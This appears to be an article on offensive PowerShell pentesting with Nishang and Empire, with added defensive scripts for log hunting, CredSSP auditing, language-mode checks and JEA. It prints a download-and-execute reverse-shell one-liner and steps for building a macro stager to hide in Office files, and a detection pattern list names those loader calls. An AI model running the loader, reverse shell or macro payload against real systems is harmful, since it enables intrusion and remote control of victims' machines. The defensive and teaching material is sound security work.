Stressing security with PowerShell


PowerShell is not the usual go-to tool for pentesting, but it can reveal IT vulnerabilities that suggest a more considered use of the tool. By Thomas Wiefel

Windows PowerShell is more than just a preferred tool for administrators – it's ideal for penetration testing. To check a system thoroughly for vulnerabilities, pentesters need to assume the role of the attacker. With the help of native scripts by Nishang and Empire, known security gaps can be tested, the authorization level escalated, system information obtained, or the system damaged by malware.

Windows PowerShell (WPS) has been the standard tool of many system administrators for several years, providing both imperative (command chains with system instructions) and declarative (defined objectives such as Desired State Configuration) features. The idea of associating this tool with "hacking" because of its everyday use seems a little strange. However, it is the comprehensive conceptual design of PowerShell that makes it interesting for penetration tests. In security, the framework is mainly used in three areas: post-exploitation, infrastructure scanning and information gathering, and attacks over the communication structure.

Procedure and Tools of Attackers

Post-exploitation essentially refers to the operational phases after a victim's system has been compromised by the attacker. The value of the compromised system is determined by the data stored on it and its potential use for malicious purposes. Post-exploitation focuses on the information from the hacked system, which is available for further use within complex structures, especially networks. In this phase, the attacker collects confidential data to analyze configuration settings, network interfaces, and other communication channels. The information is used to maintain permanent access to the system in line with the attacker's requirements. The system can be compromised by exploiting existing vulnerabilities in the remote configuration, by social engineering, or by leveraging exploits in applications.

For the second phase of infiltration, hybrid frameworks consist of non-system-specific tools like Python and generated PowerShell scripts. The setup often relies on a Linux host with a configured web server that acts as the center for attack control. Although the structure is heterogeneous, these frameworks will hereafter be called "PowerShell Frameworks," because the transferred payload comprises PowerShell code.

The other existing form of PowerShell exploit applications is native scripts. Known vulnerabilities are tested to escalate the authorization level, grab system information, and even damage the system with malware. Frameworks such as Nishang [1] and Empire [2] are available for these objectives.

Running Malicious Scripts with Nishang

Nishang is an open source framework for creating powerful PowerShell scripts. Unlike Empire, which follows the hybrid approach, Nishang is a PowerShell-only application at its core. Nishang scripts are classified as malicious and blocked by many antivirus programs. Bypassing the defenses of Windows Defender or virus scanners is in itself an attack technique that shows that PowerShell scripts can also bypass restrictions. Windows Defender prevents direct execution of Nishang PowerShell files.

A conceivable platform for executing test scripts is a sandbox system, where the scripts can be run as binary code. As tools, specialized meta-frameworks are available on GitHub, PowerLine [3] being just one example. PS2EXE [4] also follows a similar approach, although with completely different administrative goals. Another option for executing PowerShell code is based on a volatile process space, wherein scripts are placed in memory on the target system and never touch the disk. Downloading a script into memory and executing it with Invoke-Expression imports the remote script into the local session as a list of statements, which brings its functions and variables into the current scope:

PowerShell Invoke-Expression (New-Object Net.WebClient).DownloadString("http://$companyWebServer/Invoke-PowerShellTcp.ps1");
Invoke-PowerShellTcp -Reverse -IPAddress $ipAddress -Port $PortNumber
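The in-memory loader above leaves no file on disk, but the script text itself is logged once script block logging is on. The following is an added example (not part of the article, Nishang, or Empire) that enables that logging and then hunts event 4104 for the download-and-execute pattern shown above; the pattern list and the threshold of two hits are assumptions you would tune to your environment.

```powershell
# Added example (not from the article): enable PowerShell script block logging and
# search the operational log for the "download into memory, then IEX" pattern.
# Run in an elevated session; the registry path is the one Group Policy writes.

$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-ScriptBlockLogging {
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    New-ItemProperty -Path $policyKey -Name 'EnableScriptBlockLogging' -Value 1 `
        -PropertyType DWord -Force | Out-Null
}

# Indicators typical of in-memory loaders (constructed list, extend as needed).
$suspiciousPatterns = @(
    'Net\.WebClient',
    'DownloadString',
    'Invoke-Expression|\bIEX\b',
    'Invoke-PowerShellTcp'
)

function Find-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 500, [int]$MinimumHits = 2)   # threshold is an assumption
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event carries the logged ScriptBlockText.
            $text = [string]$_.Properties[2].Value
            $hits = @($suspiciousPatterns | Where-Object { $text -match $_ })
            if ($hits.Count -ge $MinimumHits) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    Hits        = ($hits -join ', ')
                    Snippet     = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

Enable-ScriptBlockLogging
Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Requiring several indicators in one block keeps ordinary administrative downloads from flooding the result list, while a block that combines a WebClient download with Invoke-Expression is exactly the shape of the snippet quoted above.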

The scripts themselves are divided into categories.

After cloning the repository into a local directory, subdirectories are available for the various objectives of a penetration test. Within the subdirectories are PowerShell applications with concrete tasks and, in the client section, scripts for creating Excel (XLS), HTML Application (HTA), or Compiled HTML Help (CHM) file types with integrated malware. The comprehensive approach makes Nishang a good introduction to penetration testing with PowerShell. With no complex requirements for the test lab, access is facilitated.

Pentesting with Empire

The Empire framework provides an example of how to use a dedicated server as a platform for the test suite. If Empire is not available on the distribution you are using, you can install it manually. First, you need to create a project directory (e.g., /opt/projects) before enabling version control and cloning the sources:

cd /opt/projects
git init
git clone

The newly created Empire directory contains the Setup subdirectory. For the installation, you need to run from this directory. Confirm the prompts shown by the routine by answering affirmatively. When you are done, you can launch the framework by typing sudo ./empire; exit closes the Empire console.

Before running any tests, it is worth taking a look at the structure of the framework.

An integrated help feature, which you can call up in Empire with the help command, gives you a hand in managing the many modules. The listeners command takes you to the listeners management menu. Within the submenu, help is context-driven and refers to the listeners. Other useful commands in this submenu are shown in Table 1.

Table 1: Useful commands in the listeners submenu

Shows active listeners.
Starts new listener module.
Initializes the stager.
Switches to the agents menu.
back or main: Leads to the main menu.
Leaves Empire.
Displays the help menu.
Provides information about the active listener.
Ends a listener process.

Empire lets you create client-based tests with Office applications and hide framework-generated macros in unobtrusive Office files, as with Nishang. Creating the malicious code is easy from the Empire console window. The first step is to switch to the listener menu. You can complete the uselistener command with the Tab key, as shown in Figure 1. An existing listener, to which you can bind a new stager, must be active. Now create the macro with:

usestager multi/macro http

Figure 1: The uselistener http command lets you create a new listener from predefined modules.

After executing the info command, you will see the settings of the macro you just created. The execute command saves the snippet with the default settings in /tmp/macro, and cat /tmp/macro displays the generated script. Now you can copy the macro and hide it in an Office file with the macro recorder.

Modules are the core of Empire. Exploring the functionality from the Empire console and the help menu opens a multitude of test possibilities against IT systems. This breadth makes the use of Empire worthwhile despite the costly creation of a test lab. Besides this offensive use of PowerShell, many approaches can minimize risks, including techniques for restricting the set of available PowerShell cmdlets and command containers (modules), for removing vulnerabilities in remote management, and ultimately, for restricting PowerShell from accessing .NET, Component Object Model (COM), and Windows Management Instrumentation (WMI) classes. (See also the "Just Enough Administration" box.)

Securing Remote Maintenance

Starting in PowerShell version 3, remote maintenance is supported by the Windows Remote Management (WinRM) service and the Web Services Management (WSMAN) protocol. WSMAN was designed as a secure and reliable method for managing computers based on Simple Object Access Protocol (SOAP) and HTTP. Both session-controlled 1:1 management with the cmdlets listed by Get-Command -Noun PSSession and 1:N administration with Invoke-Command are possible. Remote admins can start, view, terminate, and delete terminal sessions.

Additionally, alternative methods such as the Distributed Component Object Model (DCOM), which relies on WMI calls, or remote procedure calls (RPCs) also exist in PowerShell. PowerShell remoting over WinRM does not rely on an API call; rather, it communicates with a remote peer: the commands are sent to the remote shell, executed there, and the results are returned. The limitation shows up in the so-called double-hop scenario. An administrator uses PowerShell remoting to connect to server A. The existing session should then connect to server B, passing in the existing credentials. However, this approach fails, and access to the resource on server C is denied, because the credentials that were used to create the remote PowerShell session are not passed from server B to server C.

As a workaround, PowerShell offers the Credential Security Support Provider (CredSSP) as an authentication method. However, when using CredSSP, PowerShell performs a network logon that hands over the password in plain text rather than relying on an encrypted connection. The password is therefore first sent to server A, where the session can then use it to authenticate against server B.
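Because CredSSP hands the password to the first hop, the defensive question is simply whether any host is configured to delegate or accept it. The script below is an added example, not part of the article: it reads the WinRM client and service settings that govern CredSSP, basic authentication, and unencrypted transport, and offers a function that turns CredSSP off on both roles. It assumes an elevated session on a host where the WinRM service is running.

```powershell
# Added example (not from the article): audit the WinRM delegation posture of this host.
# Every path below is a real WSMan: provider item; values are read, not guessed.

function Get-WinRmDelegationPosture {
    # Get-WSManCredSSP returns human-readable lines describing client and server state.
    $credSspText = Get-WSManCredSSP

    # Service (incoming) side: which authentication schemes and transports are accepted.
    $serviceCredSSP   = (Get-Item WSMan:\localhost\Service\Auth\CredSSP).Value
    $basicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
    $allowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value

    # Client (outgoing) side: whether this host will delegate credentials when connecting.
    $clientCredSSP    = (Get-Item WSMan:\localhost\Client\Auth\CredSSP).Value

    [pscustomobject]@{
        CredSspSummary         = ($credSspText -join ' | ')
        ServiceAcceptsCredSSP  = $serviceCredSSP      # 'true' means this host accepts delegated passwords
        ClientDelegatesCredSSP = $clientCredSSP       # 'true' means this host sends its password on
        BasicAuthEnabled       = $basicAuth
        AllowUnencrypted       = $allowUnencrypted    # 'true' permits plain HTTP WinRM traffic
    }
}

function Disable-CredSspDelegation {
    # Remove delegation in both directions and refuse unencrypted transport. For the
    # double-hop case, Kerberos constrained delegation or a JEA endpoint on the first
    # hop is the usual replacement.
    Disable-WSManCredSSP -Role Client
    Disable-WSManCredSSP -Role Server
    Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $false
}

Get-WinRmDelegationPosture | Format-List
```

Running the audit across a fleet with Invoke-Command gives a quick inventory of which servers still accept delegated passwords; a value of true in either CredSSP column is the finding to chase.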

PowerShell Limitations

Windows PowerShell is a .NET application built on the System.Management.Automation namespace of the .NET framework. Interoperability with the .NET framework puts WPS on par with the most powerful scripting languages, ranking up there with high-level languages like C#. Windows PowerShell has automatic and self-defined variables, as well as host environment variables, that can be used to control PowerShell's behavior. The $ExecutionContext variable is particularly relevant for security; it contains a list of sub-objects with configuration options. Settings regarding class access are controlled by the SessionState.LanguageMode property.
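To see what the language mode actually changes, the following added example (not from the article) reads $ExecutionContext.SessionState.LanguageMode, probes whether arbitrary .NET and COM objects can be created in the current session, and compares the result with an expected baseline. The expectation that ordinary user workstations run in ConstrainedLanguage mode is an assumed policy choice, not something the article states.

```powershell
# Added example (not from the article): report the session language mode and whether
# unrestricted .NET/COM access is available, then compare against an assumed baseline.

function Get-SessionLanguageMode {
    # Possible values: FullLanguage, ConstrainedLanguage, RestrictedLanguage, NoLanguage
    [string]$ExecutionContext.SessionState.LanguageMode
}

function Test-UnrestrictedTypeAccess {
    # Creating arbitrary .NET or COM objects succeeds only in FullLanguage mode;
    # Constrained Language mode throws here instead of instantiating the types.
    try {
        $null = New-Object -ComObject 'Scripting.FileSystemObject'
        $null = [System.Net.WebClient]::new()
        return $true
    } catch {
        return $false
    }
}

function Test-LockdownCompliance {
    param([string]$ExpectedMode = 'ConstrainedLanguage')   # assumed baseline for non-admin hosts
    $mode       = Get-SessionLanguageMode
    $fullAccess = Test-UnrestrictedTypeAccess
    [pscustomobject]@{
        LanguageMode        = $mode
        FullTypeAccess      = $fullAccess
        MeetsExpectedPolicy = ($mode -eq $ExpectedMode) -and (-not $fullAccess)
    }
}

Test-LockdownCompliance | Format-List
```

The value of LanguageMode is not set by scripts themselves; it is imposed by an application control policy (WDAC or AppLocker) or by a session configuration, which is why the check is useful as a compliance probe on a workstation rather than as a setting to flip at runtime.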


Deeply anchored in the system and with access to system APIs, PowerShell can play the devil's advocate, assuming the role of the bad guys and scanning for IT vulnerabilities. The knowledge of offensive possibilities can lead to a more considered use of Windows PowerShell. Here, Just Enough Administration especially seeks to replace rigid group-based management with the roles that admins actually need.
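As an added example of the role-based approach the article ends on (not part of the article itself), the script below builds a minimal Just Enough Administration endpoint in which a helpdesk role can list services and restart exactly one of them, with no .NET, COM, or WMI access from the session. The module name HelpdeskJea, the group CONTOSO\Helpdesk, the role name ServiceOperator, the service name Spooler, and the transcript directory are all assumptions to be adapted.

```powershell
# Added example (not from the article): a minimal JEA endpoint. Run in an elevated
# session on the server that should expose the restricted endpoint.

$moduleDir = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\HelpdeskJea'   # assumed name
$capDir    = Join-Path $moduleDir 'RoleCapabilities'
New-Item -Path $capDir -ItemType Directory -Force | Out-Null

# 1. Role capability: only these cmdlets are visible, and Restart-Service is pinned to a
#    single service name, so the role cannot restart anything else.
New-PSRoleCapabilityFile -Path (Join-Path $capDir 'ServiceOperator.psrc') `
    -VisibleCmdlets @(
        'Get-Service',
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
    ) `
    -Description 'Helpdesk: view services and restart the print spooler'

# A module manifest makes the RoleCapabilities folder discoverable by JEA.
New-ModuleManifest -Path (Join-Path $moduleDir 'HelpdeskJea.psd1')

# 2. Session configuration: RestrictedRemoteServer implies NoLanguage mode (no .NET, COM
#    or WMI calls from the session), a virtual account replaces standing admin rights for
#    group members, and every session is transcribed for later review.
$pssc = Join-Path $env:TEMP 'HelpdeskJea.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JeaTranscripts' `
    -RoleDefinitions @{ 'CONTOSO\Helpdesk' = @{ RoleCapabilities = 'ServiceOperator' } }   # assumed group

# 3. Validate the file, register the endpoint, and confirm what a connecting user sees.
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw 'Session configuration file is invalid' }
Register-PSSessionConfiguration -Name 'Helpdesk' -Path $pssc -Force | Out-Null

# Connecting with -ConfigurationName lands in the restricted endpoint; Get-Command there
# lists only the whitelisted cmdlets plus the JEA defaults (Exit-PSSession and friends).
Invoke-Command -ComputerName localhost -ConfigurationName 'Helpdesk' -ScriptBlock { Get-Command } |
    Select-Object Name, CommandType
```

Compared with handing the helpdesk group local administrator rights on every server, the endpoint grants precisely the two actions the role needs, records who did what in the transcript directory, and, because the session runs in NoLanguage mode, leaves none of the .NET, COM, or WMI surface that the offensive frameworks above depend on.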